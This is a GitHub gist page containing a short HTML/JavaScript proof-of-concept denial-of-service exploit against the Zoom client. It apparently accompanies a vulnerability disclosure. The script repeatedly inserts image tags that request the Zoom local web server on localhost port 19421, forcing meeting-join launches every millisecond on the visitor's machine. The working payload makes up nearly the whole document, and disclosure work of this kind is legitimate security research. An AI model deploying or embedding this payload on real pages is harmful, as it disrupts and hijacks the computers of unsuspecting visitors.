Skip to content

Instantly share code, notes, and snippets.

@JLLeitschuh
Created July 7, 2019 04:01
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JLLeitschuh/a2d5f27f320f614f0028ce54333ece4f to your computer and use it in GitHub Desktop.
Save JLLeitschuh/a2d5f27f320f614f0028ce54333ece4f to your computer and use it in GitHub Desktop.
Denial of service POC for Zoom
<body>
<script>
// It's actually better if this number isn't a valid zoom number.
var attackNumber = "694138052"
setInterval(function(){
var image = document.createElement("img");
// Use a date to bust the browser's cache
var date = new Date();
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();
image.onload = function() {
// Be tidy, clean up the DOM afterwards
image.parentNode.removeChild(image);
};
document.body.appendChild(image);
}, 1);
</script>
</body>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment